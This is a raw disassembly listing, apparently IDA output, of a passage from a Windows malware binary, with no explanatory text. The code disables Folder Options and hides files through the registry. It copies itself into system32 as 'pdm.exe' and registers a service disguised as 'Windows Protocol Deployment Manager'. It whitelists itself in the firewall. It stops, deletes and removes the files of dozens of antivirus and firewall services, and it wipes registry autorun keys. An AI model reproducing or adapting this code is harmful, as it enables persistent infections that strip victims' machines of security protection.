push dword ptr [esp+18h+var_8]
call dword_40A000 ; RegCloseKey
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_402716 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40279C proc near ; CODE XREF: sub_402B5D+43�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
lea eax, [ebp+var_4]
push edi
mov edi, dword_40A008
push eax
push 20006h
push 0
mov ebx, 80000001h
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push ebx
mov [ebp+var_C], 1
call edi ; RegOpenKeyExA
mov esi, dword_40A004
test eax, eax
jnz short loc_4027EC
lea eax, [ebp+var_C]
push 4
push eax
push 4
push 0
push offset aNofolderoption ; "NoFolderOptions"
push [ebp+var_4]
call esi ; RegSetValueExA
loc_4027EC: ; CODE XREF: sub_40279C+3A�j
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
push offset aSoftwareMicr_3 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push ebx
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40283B
push 4
lea eax, [ebp+var_8]
pop edi
xor ebx, ebx
push edi
push eax
push edi
push ebx
push offset aHidden ; "Hidden"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_8]
push edi
push eax
push edi
push ebx
push offset aShowsuperhidde ; "ShowSuperHidden"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_C]
push edi
push eax
push edi
push ebx
push offset aHidefileext ; "HideFileExt"
push [ebp+var_4]
call esi ; RegSetValueExA
loc_40283B: ; CODE XREF: sub_40279C+65�j
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
pop edi
pop esi
pop ebx
leave
retn
sub_40279C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402849 proc near ; CODE XREF: sub_4032B7+39�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 208h
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call dword_40A008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4028D3
lea eax, [ebp+var_208]
push 104h
push eax
push 0
call dword_40A0C0 ; GetModuleFileNameA
lea eax, [ebp+var_208]
push offset aMicrosoftRWind ; "Microsoft (R) Windows Protocol Deployme"...
push eax
push offset aSEnabledS ; "%s:*:Enabled:%s"
lea eax, [ebp+var_104]
push 100h
push eax
call sub_404090
lea eax, [ebp+var_104]
push eax
call sub_403B90
add esp, 18h
inc eax
push eax
lea eax, [ebp+var_104]
push eax
push 1
lea eax, [ebp+var_208]
push 0
push eax
push [ebp+var_4]
call dword_40A004 ; RegSetValueExA
loc_4028D3: ; CODE XREF: sub_402849+26�j
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
leave
retn
sub_402849 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028DE proc near ; CODE XREF: sub_402B5D+8E�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
xor ebx, ebx
push eax
push ebx
call dword_40A0C0 ; GetModuleFileNameA
lea eax, [ebp+var_4]
mov edi, offset aSoftwareTmp ; "SOFTWARE\\Tmp"
push eax
push 20006h
push ebx
mov esi, 80000002h
push edi
push esi
call dword_40A008 ; RegOpenKeyExA
test eax, eax
jz short loc_402935
lea eax, [ebp+var_4]
push ebx
push eax
push ebx
push 2001Fh
push ebx
push ebx
push ebx
push edi
push esi
call dword_40A00C ; RegCreateKeyExA
loc_402935: ; CODE XREF: sub_4028DE+3F�j
lea eax, [ebp+var_108]
push eax
call sub_403B90
pop ecx
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push ebx
push offset aPath ; "Path"
push [ebp+var_4]
call dword_40A004 ; RegSetValueExA
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
pop edi
pop esi
pop ebx
leave
retn
sub_4028DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40296A proc near ; CODE XREF: sub_4032FB:loc_4033AF�p
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10Ch
lea eax, [ebp+var_4]
push esi
push eax
xor esi, esi
push 0F003Fh
push esi
push offset aSoftwareTmp ; "SOFTWARE\\Tmp"
push 80000002h
mov [ebp+var_8], 104h
call dword_40A008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4029D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10C]
push eax
push esi
push esi
mov esi, offset aPath ; "Path"
push esi
push [ebp+var_4]
call dword_40A014 ; RegQueryValueExA
test eax, eax
jnz short loc_4029D2
lea eax, [ebp+var_10C]
push eax
call dword_40A0D0 ; DeleteFileA
push esi
push [ebp+var_4]
call dword_40A010 ; RegDeleteValueA
loc_4029D2: ; CODE XREF: sub_40296A+2F�j
; sub_40296A+4F�j
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
pop esi
leave
retn
sub_40296A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029DE proc near ; CODE XREF: sub_4029DE+BB�p
; sub_4031FA+F�p
var_20C = byte ptr -20Ch
var_10C = byte ptr -10Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
lea eax, [ebp+var_4]
push esi
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A008 ; RegOpenKeyExA
test eax, eax
jnz loc_402AB6
push esi
push esi
push esi
push esi
push esi
push esi
lea eax, [ebp+var_C]
push esi
push eax
push esi
push esi
push esi
push [ebp+var_4]
call dword_40A020 ; RegQueryInfoKeyA
mov eax, [ebp+var_C]
cmp eax, esi
jz loc_402AB6
lea ebx, [eax+1]
loc_402A2E: ; CODE XREF: sub_4029DE+7B�j
; sub_4029DE+8F�j ...
cmp ebx, esi
jz loc_402AB6
push esi
push esi
push esi
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_10C]
dec ebx
push eax
push ebx
push [ebp+var_4]
mov [ebp+var_8], 0FFh
call dword_40A01C ; RegEnumKeyExA
test eax, eax
jnz short loc_402A2E
lea eax, [ebp+var_10C]
push eax
push [ebp+var_4]
call dword_40A018 ; RegDeleteKeyA
test eax, eax
jz short loc_402A2E
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_20C]
push [ebp+arg_4]
push offset aSS ; "%s\\%s"
push 0FFh
push eax
call sub_404090
lea eax, [ebp+var_20C]
push eax
push [ebp+arg_0]
call sub_4029DE
add esp, 1Ch
lea eax, [ebp+var_10C]
push eax
push [ebp+var_4]
call dword_40A018 ; RegDeleteKeyA
jmp loc_402A2E
; ---------------------------------------------------------------------------
loc_402AB6: ; CODE XREF: sub_4029DE+25�j
; sub_4029DE+47�j ...
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
pop esi
pop ebx
leave
retn
sub_4029DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AC3 proc near ; CODE XREF: sub_4031FA+1A�p
; sub_4031FA+2A�p ...
var_4004 = byte ptr -4004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4004h
call sub_403E90
push ebx
lea eax, [ebp+arg_4]
push esi
push eax
xor ebx, ebx
push 0F003Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A008 ; RegOpenKeyExA
test eax, eax
jnz short loc_402B50
push ebx
push ebx
push ebx
lea eax, [ebp+arg_0]
push ebx
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
call dword_40A020 ; RegQueryInfoKeyA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_402B50
lea esi, [eax+1]
loc_402B0F: ; CODE XREF: sub_402AC3+79�j
; sub_402AC3+8B�j
cmp esi, ebx
jz short loc_402B50
push ebx
push ebx
push ebx
lea eax, [ebp+var_4]
push ebx
push eax
lea eax, [ebp+var_4004]
dec esi
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_4], 3FFFh
mov [ebp+var_4004], bl
call dword_40A024 ; RegEnumValueA
test eax, eax
jnz short loc_402B0F
lea eax, [ebp+var_4004]
push eax
push [ebp+arg_4]
call dword_40A010 ; RegDeleteValueA
jmp short loc_402B0F
; ---------------------------------------------------------------------------
loc_402B50: ; CODE XREF: sub_402AC3+29�j
; sub_402AC3+47�j ...
push [ebp+arg_4]
call dword_40A000 ; RegCloseKey
pop esi
pop ebx
leave
retn
sub_402AC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B5D proc near ; CODE XREF: sub_4032FB+AB�p
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
mov ebx, 104h
push edi
lea eax, [ebp+var_25C]
push ebx
xor esi, esi
push eax
push esi
call dword_40A0C0 ; GetModuleFileNameA
push [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_158]
push edi
push offset aSS ; "%s\\%s"
push ebx
push eax
call sub_404090
add esp, 14h
call sub_402716
call sub_40279C
call sub_4031FA
push edi
call dword_40A0EC ; SetCurrentDirectoryA
test eax, eax
jnz short loc_402BBD
push esi
push edi
call dword_40A0E8 ; CreateDirectoryA
loc_402BBD: ; CODE XREF: sub_402B5D+56�j
lea eax, [ebp+var_158]
push esi
push eax
lea eax, [ebp+var_25C]
push eax
call dword_40A0E4 ; CopyFileA
mov ebx, 2002h
push ebx
push edi
mov edi, dword_40A0E0
call edi ; SetFileAttributesA
lea eax, [ebp+var_158]
push ebx
push eax
call edi ; SetFileAttributesA
call sub_4028DE
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_403AC0
push 44h
lea eax, [ebp+var_54]
pop edi
push edi
push esi
push eax
call sub_403AC0
add esp, 18h
lea ecx, [ebp+var_10]
mov [ebp+var_48], esi
mov [ebp+var_54], edi
push 1
mov [ebp+var_24], si
pop eax
push ecx
lea ecx, [ebp+var_54]
push ecx
mov [ebp+var_28], eax
push [ebp+arg_0]
push esi
push 28h
push eax
push esi
push esi
lea eax, [ebp+var_158]
push esi
push eax
call dword_40A0DC ; CreateProcessA
test eax, eax
jz short loc_402C57
push [ebp+var_10]
mov edi, dword_40A0D8
call edi ; CloseHandle
push [ebp+var_C]
call edi ; CloseHandle
push esi
call dword_40A0D4 ; ExitProcess
loc_402C57: ; CODE XREF: sub_402B5D+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_402B5D endp
; =============== S U B R O U T I N E =======================================
sub_402C5C proc near ; CODE XREF: sub_40301A+5�p
; sub_40301A+11�p ...
arg_4 = dword ptr 8
push ecx
push edi
xor edi, edi
push 0F003Fh
push edi
push edi
call dword_40A040 ; OpenSCManagerA
cmp eax, edi
mov [esp+4], eax
jz short loc_402CEC
push esi
push 10023h
push [esp+0Ch+arg_4]
push eax
call dword_40A03C ; OpenServiceA
mov esi, eax
cmp esi, edi
jz short loc_402CE4
push ebx
push ebp
push edi
push edi
push edi
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push esi
call dword_40A038 ; ChangeServiceConfigA
push edi
push 1
push esi
call dword_40A034 ; ControlService
push esi
call dword_40A030 ; DeleteService
mov ebx, 1000h
push ebx
push 40h
call dword_40A100 ; LocalAlloc
mov ebp, eax
push edi
push ebx
push ebp
push esi
call dword_40A02C ; QueryServiceConfigA
cmp eax, 1
jnz short loc_402CDB
push dword ptr [ebp+0Ch]
call dword_40A0D0 ; DeleteFileA
loc_402CDB: ; CODE XREF: sub_402C5C+74�j
push ebp
call dword_40A0FC ; LocalFree
pop ebp
pop ebx
loc_402CE4: ; CODE XREF: sub_402C5C+2E�j
push esi
call dword_40A028 ; CloseServiceHandle
pop esi
loc_402CEC: ; CODE XREF: sub_402C5C+17�j
push dword ptr [esp+4]
call dword_40A028 ; CloseServiceHandle
pop edi
pop ecx
retn
sub_402C5C endp
; =============== S U B R O U T I N E =======================================
sub_402CF9 proc near ; CODE XREF: sub_4032FB+E7�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
xor esi, esi
push 10000000h
push esi
push esi
call dword_40A040 ; OpenSCManagerA
mov ebp, dword_40A028
mov ebx, eax
cmp ebx, esi
jz short loc_402D4C
push edi
push 12h
push [esp+14h+arg_0]
push ebx
call dword_40A03C ; OpenServiceA
mov edi, eax
cmp edi, esi
jz short loc_402D48
push esi
push esi
push esi
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push 2
push 0FFFFFFFFh
push edi
call dword_40A038 ; ChangeServiceConfigA
push esi
push esi
push edi
call dword_40A044 ; StartServiceA
loc_402D48: ; CODE XREF: sub_402CF9+30�j
push edi
call ebp ; CloseServiceHandle
pop edi
loc_402D4C: ; CODE XREF: sub_402CF9+1C�j
push ebx
call ebp ; CloseServiceHandle
pop esi
pop ebp
pop ebx
retn
sub_402CF9 endp
; =============== S U B R O U T I N E =======================================
sub_402D53 proc near ; CODE XREF: sub_402F96+5�p
; sub_402F96+11�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
xor esi, esi
push 0F003Fh
push esi
push esi
call dword_40A040 ; OpenSCManagerA
mov ebp, dword_40A028
mov ebx, eax
cmp ebx, esi
jz short loc_402DBB
push edi
push 22h
push [esp+14h+arg_0]
push ebx
call dword_40A03C ; OpenServiceA
mov edi, eax
cmp edi, esi
jz short loc_402DB7
push esi
push esi
push esi
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push edi
call dword_40A038 ; ChangeServiceConfigA
push offset aWinsock ; "winsock"
push [esp+10h+arg_4]
call sub_404180
pop ecx
test eax, eax
pop ecx
jnz short loc_402DB7
push esi
push 1
push edi
call dword_40A034 ; ControlService
loc_402DB7: ; CODE XREF: sub_402D53+30�j
; sub_402D53+58�j
push edi
call ebp ; CloseServiceHandle
pop edi
loc_402DBB: ; CODE XREF: sub_402D53+1C�j
push ebx
call ebp ; CloseServiceHandle
pop esi
pop ebp
pop ebx
retn
sub_402D53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DC2 proc near ; CODE XREF: sub_4032FB+EF�p
var_22C = byte ptr -22Ch
var_128 = byte ptr -128h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
push esi
xor esi, esi
push 40000000h
push esi
push esi
mov [ebp+var_4], esi
call dword_40A040 ; OpenSCManagerA
cmp eax, esi
mov [ebp+var_8], eax
jz loc_402E9D
push edi
lea eax, [ebp+var_22C]
push 104h
push eax
push esi
call dword_40A0C0 ; GetModuleFileNameA
push esi
push esi
push esi
push esi
lea eax, [ebp+var_22C]
push esi
push eax
push esi
push 2
push 10h
push 10000000h
push offset aWindowsProtoco ; "Windows Protocol Deployment Manager"
push [ebp+arg_0]
push [ebp+var_8]
call dword_40A04C ; CreateServiceA
cmp eax, esi
mov [ebp+arg_0], eax
jz short loc_402E93
push ebx
mov ebx, dword_40A048
lea ecx, [ebp+var_14]
push 1
mov [ebp+var_18], ecx
pop edi
lea ecx, [ebp+var_28]
mov [ebp+var_14], edi
push ecx
push 2
push eax
mov [ebp+var_10], esi
mov [ebp+var_28], esi
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], edi
call ebx ; ChangeServiceConfig2A
push 100h
lea eax, [ebp+var_128]
push offset aProvidesImplem ; "Provides implementation support for thi"...
push eax
call dword_40A104 ; lstrcpyn
lea eax, [ebp+var_128]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push edi
push [ebp+arg_0]
call ebx ; ChangeServiceConfig2A
push esi
push esi
push [ebp+arg_0]
call dword_40A044 ; StartServiceA
cmp eax, edi
pop ebx
jnz short loc_402E93
mov [ebp+var_4], edi
loc_402E93: ; CODE XREF: sub_402DC2+67�j
; sub_402DC2+CC�j
push [ebp+arg_0]
call dword_40A028 ; CloseServiceHandle
pop edi
loc_402E9D: ; CODE XREF: sub_402DC2+21�j
push [ebp+var_8]
call dword_40A028 ; CloseServiceHandle
mov eax, [ebp+var_4]
pop esi
leave
retn
sub_402DC2 endp
; =============== S U B R O U T I N E =======================================
sub_402EAC proc near ; CODE XREF: sub_4032FB+BF�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_40A040 ; OpenSCManagerA
mov edi, dword_40A028
mov esi, eax
cmp esi, ebx
jz short loc_402EE4
push 80000000h
push [esp+10h+arg_0]
push esi
call dword_40A03C ; OpenServiceA
cmp eax, ebx
jz short loc_402EE1
push 1
pop ebx
loc_402EE1: ; CODE XREF: sub_402EAC+30�j
push eax
call edi ; CloseServiceHandle
loc_402EE4: ; CODE XREF: sub_402EAC+1C�j
push esi
call edi ; CloseServiceHandle
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_402EAC endp
; =============== S U B R O U T I N E =======================================
sub_402EED proc near ; DATA XREF: sub_402F19+6�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
jz short loc_402EF9
sub eax, 4
jnz short loc_402F14
loc_402EF9: ; CODE XREF: sub_402EED+5�j
push offset dword_40E6A0
mov dword_40E6A4, 1
push dword_40E688
call dword_40A050 ; SetServiceStatus
loc_402F14: ; CODE XREF: sub_402EED+A�j
xor eax, eax
retn 10h
sub_402EED endp
; =============== S U B R O U T I N E =======================================
sub_402F19 proc near ; DATA XREF: sub_4032FB+D9�o
push ebx
push esi
xor esi, esi
push edi
push esi
push offset sub_402EED
push offset aPdm ; "PDM"
call dword_40A054 ; RegisterServiceCtrlHandlerExA
push 1
mov edi, offset dword_40E6A0
pop ebx
mov dword_40E6B0, esi
mov dword_40E6B8, esi
mov dword_40E6AC, esi
mov esi, dword_40A050
push edi
push eax
mov dword_40E688, eax
mov dword_40E6B4, ebx
mov dword_40E6A8, 5
mov dword_40E6A4, 4
mov dword_40E6A0, 10h
call esi ; SetServiceStatus
call sub_4032B7
push edi
mov dword_40E6A4, ebx
push dword_40E688
call esi ; SetServiceStatus
pop edi
pop esi
pop ebx
retn 8
sub_402F19 endp
; =============== S U B R O U T I N E =======================================
sub_402F96 proc near ; CODE XREF: sub_4032B7+25�p
var_4 = dword ptr -4
push offset aSharedaccess ; "SharedAccess"
call sub_402D53
mov [esp+4+var_4], offset aAlerter ; "Alerter"
call sub_402D53
mov [esp+4+var_4], offset aAlg ; "ALG"
call sub_402D53
mov [esp+4+var_4], offset aErsvc ; "ERSvc"
call sub_402D53
mov [esp+4+var_4], offset aHelpsvc ; "helpsvc"
call sub_402D53
mov [esp+4+var_4], offset aMessenger ; "Messenger"
call sub_402D53
mov [esp+4+var_4], offset aWscsvc ; "wscsvc"
call sub_402D53
mov [esp+4+var_4], offset aSrservice ; "srservice"
call sub_402D53
mov [esp+4+var_4], offset aSamss ; "SamSs"
call sub_402D53
mov [esp+4+var_4], offset aRemoteregistry ; "RemoteRegistry"
call sub_402D53
mov [esp+4+var_4], offset aSens ; "SENS"
call sub_402D53
pop ecx
retn
sub_402F96 endp
; =============== S U B R O U T I N E =======================================
sub_40301A proc near ; CODE XREF: sub_4032B7+2A�p
var_4 = dword ptr -4
push offset aMcupdmgr_exe ; "mcupdmgr.exe"
call sub_402C5C
mov [esp+4+var_4], offset aMctskshd_exe ; "McTskshd.exe"
call sub_402C5C
mov [esp+4+var_4], offset aMcdetect_exe ; "McDetect.exe"
call sub_402C5C
mov [esp+4+var_4], offset aMcshield ; "McShield"
call sub_402C5C
mov [esp+4+var_4], offset aLiveupdate ; "LiveUpdate"
call sub_402C5C
mov [esp+4+var_4], offset aNavapsvc ; "navapsvc"
call sub_402C5C
mov [esp+4+var_4], offset aNscservice ; "NSCService"
call sub_402C5C
mov [esp+4+var_4], offset aSavscan ; "SAVScan"
call sub_402C5C
mov [esp+4+var_4], offset aSndsrvc ; "SNDSrvc"
call sub_402C5C
mov [esp+4+var_4], offset aCcsetmgr ; "ccSetMgr"
call sub_402C5C
mov [esp+4+var_4], offset aSens ; "SENS"
call sub_402C5C
mov [esp+4+var_4], offset aKavsvc ; "kavsvc"
call sub_402C5C
mov [esp+4+var_4], offset aAvp ; "AVP"
call sub_402C5C
mov [esp+4+var_4], offset aFiresvc ; "FireSvc"
call sub_402C5C
mov [esp+4+var_4], offset aKpfwsvc ; "KPfwSvc"
call sub_402C5C
mov [esp+4+var_4], offset aKvsrvxp ; "KVSrvXP"
call sub_402C5C
mov [esp+4+var_4], offset aKvwsc ; "KVWSC"
call sub_402C5C
mov [esp+4+var_4], offset aMcafeeframewor ; "McAfeeFramework"
call sub_402C5C
mov [esp+4+var_4], offset aMctaskmanager ; "McTaskManager"
call sub_402C5C
mov [esp+4+var_4], offset aMskservice ; "MskService"
call sub_402C5C
mov [esp+4+var_4], offset aRsccenter ; "RsCCenter"
call sub_402C5C
mov [esp+4+var_4], offset aRsravmon ; "RsRavMon"
call sub_402C5C
mov [esp+4+var_4], offset aSymantecCoreLc ; "Symantec Core LC"
call sub_402C5C
pop ecx
retn
sub_40301A endp
; =============== S U B R O U T I N E =======================================
sub_40312E proc near ; CODE XREF: sub_4032B7+2F�p
var_4 = dword ptr -4
push offset aCaisafe ; "CAISafe"
call sub_402C5C
mov [esp+4+var_4], offset aUmxcfg ; "UmxCfg"
call sub_402C5C
mov [esp+4+var_4], offset aUmxagent ; "UmxAgent"
call sub_402C5C
mov [esp+4+var_4], offset aKpf4 ; "KPF4"
call sub_402C5C
mov [esp+4+var_4], offset aWebrootfirewal ; "WebrootFirewall"
call sub_402C5C
mov [esp+4+var_4], offset aWinroute ; "WinRoute"
call sub_402C5C
mov [esp+4+var_4], offset aAvgfwsrv ; "AVGFwSrv"
call sub_402C5C
mov [esp+4+var_4], offset aAvg7alrt ; "Avg7Alrt"
call sub_402C5C
mov [esp+4+var_4], offset aOutpostfirewal ; "OutpostFirewall"
call sub_402C5C
mov [esp+4+var_4], offset aLavasoftfirewa ; "LavasoftFirewall"
call sub_402C5C
mov [esp+4+var_4], offset aMpfservice ; "MpfService"
call sub_402C5C
mov [esp+4+var_4], offset aVsmon ; "vsmon"
call sub_402C5C
mov [esp+4+var_4], offset aNpfmntor ; "NPFMntor"
call sub_402C5C
mov [esp+4+var_4], offset aCcevtmgr ; "ccEvtMgr"
call sub_402C5C
mov [esp+4+var_4], offset aCcproxy ; "ccProxy"
call sub_402C5C
mov [esp+4+var_4], offset aCclspwdsvc ; "cclSPwdSvc"
call sub_402C5C
mov [esp+4+var_4], offset aSpbbcsvc ; "SPBBCSvc"
call sub_402C5C
pop ecx
retn
sub_40312E endp
; =============== S U B R O U T I N E =======================================
sub_4031FA proc near ; CODE XREF: sub_402B5D+48�p
push ebx
push ebp
push esi
push edi
mov esi, 80000002h
push offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_4029DE
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push esi
call sub_402AC3
mov edi, 80000001h
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push edi
call sub_402AC3
push offset aSoftwareMicr_5 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push edi
call sub_402AC3
mov ebp, offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push ebp
push edi
call sub_402AC3
mov ebx, offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push ebx
push edi
call sub_402AC3
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_402AC3
push offset aSoftwareMicr_5 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_402AC3
add esp, 40h
push ebp
push esi
call sub_402AC3
push ebx
push esi
call sub_402AC3
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4031FA endp
; =============== S U B R O U T I N E =======================================
sub_40327B proc near ; CODE XREF: sub_4032B7+20�p
var_4 = dword ptr -4
push offset aWsas ; "wsas"
call sub_402C5C
mov [esp+4+var_4], offset aNlc ; "nlc"
call sub_402C5C
mov [esp+4+var_4], offset aNsms ; "nsms"
call sub_402C5C
mov [esp+4+var_4], offset aNtrcs ; "ntrcs"
call sub_402C5C
mov [esp+4+var_4], offset aVistaruntimesv ; "VistaRuntimeSvc"
call sub_402C5C
pop ecx
retn
sub_40327B endp
; =============== S U B R O U T I N E =======================================
sub_4032B7 proc near ; CODE XREF: sub_402F19+63�p
push offset aWpdm_class_ ; "WPDM_Class_"
push 1
push 0
call dword_40A108 ; CreateMutexA
test eax, eax
jz short locret_4032FA
call dword_40A0F4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short locret_4032FA
call sub_40327B
call sub_402F96
call sub_40301A
call sub_40312E
call sub_4025AD
call sub_402849
jmp sub_4018FD
; ---------------------------------------------------------------------------
locret_4032FA: ; CODE XREF: sub_4032B7+11�j
; sub_4032B7+1E�j
retn
sub_4032B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032FB proc near ; CODE XREF: sub_404200+C9�p
var_31C = byte ptr -31Ch
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 31Ch
push esi
push edi
push 2
call dword_40A10C ; SetErrorMode
mov edi, 104h
lea eax, [ebp+var_31C]
push edi
push eax
push 0
call dword_40A0C0 ; GetModuleFileNameA
mov esi, offset aWindir ; "%WINDIR%"
push esi
push esi
call sub_404180
pop ecx
test eax, eax
pop ecx
jz short loc_403343
lea eax, [ebp+var_114]
push edi
push eax
call dword_40A0F8 ; GetWindowsDirectoryA
loc_403343: ; CODE XREF: sub_4032FB+38�j
push offset aSysdir ; "%SYSDIR%"
push esi
call sub_404180
pop ecx
test eax, eax
pop ecx
jz short loc_403362
lea eax, [ebp+var_114]
push edi
push eax
call dword_40A0CC ; GetSystemDirectoryA
loc_403362: ; CODE XREF: sub_4032FB+57�j
lea eax, [ebp+var_114]
push offset aSystem32 ; "system32"
push eax
push offset aSS ; "%s\\%s"
lea eax, [ebp+var_218]
push edi
push eax
call sub_404090
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_404180
add esp, 1Ch
test eax, eax
jnz short loc_4033AF
lea eax, [ebp+var_218]
push offset aPdm_exe ; "pdm.exe"
push eax
call sub_402B5D
pop ecx
pop ecx
jmp short loc_4033B4
; ---------------------------------------------------------------------------
loc_4033AF: ; CODE XREF: sub_4032FB+9D�j
call sub_40296A
loc_4033B4: ; CODE XREF: sub_4032FB+B2�j
mov esi, offset aPdm ; "PDM"
push esi
call sub_402EAC
cmp eax, 1
pop ecx
jnz short loc_4033E9
and [ebp+var_8], 0
and [ebp+var_4], 0
lea eax, [ebp+var_10]
mov [ebp+var_10], esi
push eax
mov [ebp+var_C], offset sub_402F19
call dword_40A058 ; StartServiceCtrlDispatcherA
push esi
call sub_402CF9
jmp short loc_4033EF
; ---------------------------------------------------------------------------
loc_4033E9: ; CODE XREF: sub_4032FB+C8�j
push esi
call sub_402DC2
loc_4033EF: ; CODE XREF: sub_4032FB+EC�j
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 10h
sub_4032FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033F8 proc near ; CODE XREF: sub_401063+61�p
; sub_40146B+4E�p
jmp dword_40A1A4
sub_4033F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033FE proc near ; CODE XREF: sub_401063+41�p
; sub_401063+4B�p ...
jmp dword_40A1A0
sub_4033FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403404 proc near ; CODE XREF: sub_4018FD+1C4�p
; sub_4018FD+2C3�p ...
jmp dword_40A19C
sub_403404 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40340A proc near ; CODE XREF: sub_401210+B6�p
; sub_4018FD+19D�p
jmp dword_40A198
sub_40340A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403410 proc near ; CODE XREF: sub_401118+4F�p
jmp dword_40A194
sub_403410 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403416 proc near ; CODE XREF: sub_401063+90�p
; sub_401118+40�p ...
jmp dword_40A190
sub_403416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40341C proc near ; CODE XREF: sub_401000+2B�p
